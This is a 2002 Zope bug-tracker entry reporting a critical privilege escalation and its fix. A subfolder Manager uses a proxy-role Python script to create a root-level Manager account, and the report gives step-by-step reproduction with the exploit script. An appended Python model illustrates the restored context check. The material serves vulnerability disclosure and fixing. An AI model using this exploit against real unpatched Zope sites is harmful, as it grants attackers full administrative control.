[ZCM] [ZC] 254/ 3 Resolve "Manager in lower folder can create manager in higher folder"

Collector: Zope Bugs and Patches ... zope-coders@zope.org
Fri, 01 Mar 2002 13:08:30 -0500


Issue #254 Update (Resolve) "Manager in lower folder can create manager in higher folder"
 ** Security Related ** (Public)
 Status Resolved, Zope/bug critical
To followup, visit:
  http://collector.zope.org/Zope/254

==============================================================
= Resolve - Entry #3 by matt on Mar 1, 2002 1:08 pm

 Status: Accepted => Resolved

Fixed in Zope 2.4.4, Zope 2.5.1, and CVS trunk; the user object being returned by getUserById was not wrapped in the surrounding context, preventing ZopeSecurityPolicy_validate from being able to filter out roles the owner did not possess.
________________________________________
= Assign_confidential - Entry #2 by matt on Mar 1, 2002 10:26 am

 Status: Pending => Accepted

 Supporters added: matt


________________________________________
= Request - Entry #1 by stevea on Feb 28, 2002 6:06 am

This was reported by ivo@amaze.nl, and is a very current concern on his FreeZope service. One of the users of that service reported this exploit.

I have personally verified that this works on a fresh Zope 2.5.0 compiled from source on Linux.

Basically, a user defined in 

  /subfolder/acl_users/trusted_user

with the Manager role can use a restricted Python script with proxy roles to create a new user with the Manager role in the root acl_users folder.

Here's how to do it.

Stage 1: set up the environment.

1: take a fresh Zope 2.5.0

2: log in as the default admin user

3: create a folder in the root folder, called "subfolder". Check the box to create a user-folder in subfolder.

4: Create a user "trusted_user" in /subfolder/acl_users, with the role of Manager.

5: Log out as admin

Stage 2: trusted_user creates a manager in the root acl_users

1: log into /subfolder/manage as trusted_user

2: create a Script (Python)

3: edit it as follows:

 request = container.REQUEST
 # PARENTS[-1] is the root folder, so this is the root acl_users
 userfolder = getattr(request.PARENTS[-1], 'acl_users')
 user_info = { 'name': 'new_manager',
               'password': 'secret',
               'confirm': 'secret',
               'roles': ['Manager','Owner'],
               'domains': []
              }
 # manage_users reads the form fields from the REQUEST argument
 userfolder.manage_users(submit='Add', REQUEST=user_info)
 return "hacked"

4: Go to the proxy tab, and give it the Manager proxy role.

5: test the script. It will return the string "hacked".

6: log out as trusted_user

Stage 3: abusing the new power

1: go to the URL /manage. Log in as new_manager:secret

2: do bad stuff

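
The check that Entry #3 describes as restored, modelled here as an added example and not Zope's own implementation: Folder, User, roles_for_proxied_call and check_context are hypothetical names, and a User built with home=None stands for the user object that getUserById returned without its surrounding context. It replays the layout from the steps above (trusted_user defined only in /subfolder) against the root and against /subfolder, and shows the wrapped owner denied proxy roles at the root while the unwrapped one is let through.

```python
class Folder:
    """A node in the content tree; the root has no parent."""
    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent

    def is_within(self, ancestor):
        """True if `ancestor` is this folder or one of its parents."""
        node = self
        while node is not None:
            if node is ancestor:
                return True
            node = node.parent
        return False

class User:
    """A user; `home` is the folder whose acl_users defines it.  home=None
    stands for a user object returned without its context (the unwrapped
    case described in Entry #3).  Hypothetical model, not Zope's class."""
    def __init__(self, name, roles, home=None):
        self.name = name
        self.roles = frozenset(roles)
        self.home = home

    def check_context(self, obj):
        # Unwrapped: the defining folder cannot be determined, so the
        # pre-fix check had nothing to compare against and let it through.
        if self.home is None:
            return True
        return obj.is_within(self.home)

def roles_for_proxied_call(owner, proxy_roles, accessed):
    """Roles a proxied script gets when it touches `accessed`: its proxy
    roles if the owner's folder encloses the target, else none at all."""
    if not owner.check_context(accessed):
        return frozenset()
    return frozenset(proxy_roles)

# Layout from the report: trusted_user is a Manager in /subfolder only.
root = Folder("")
subfolder = Folder("subfolder", root)
wrapped = User("trusted_user", ["Manager"], home=subfolder)  # after the fix
unwrapped = User("trusted_user", ["Manager"])                # before the fix

if __name__ == "__main__":
    for label, owner in (("wrapped", wrapped), ("unwrapped", unwrapped)):
        for target, folder in (("root", root), ("/subfolder", subfolder)):
            print(label, "->", target, sorted(roles_for_proxied_call(owner, ["Manager"], folder)))
```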

==============================================================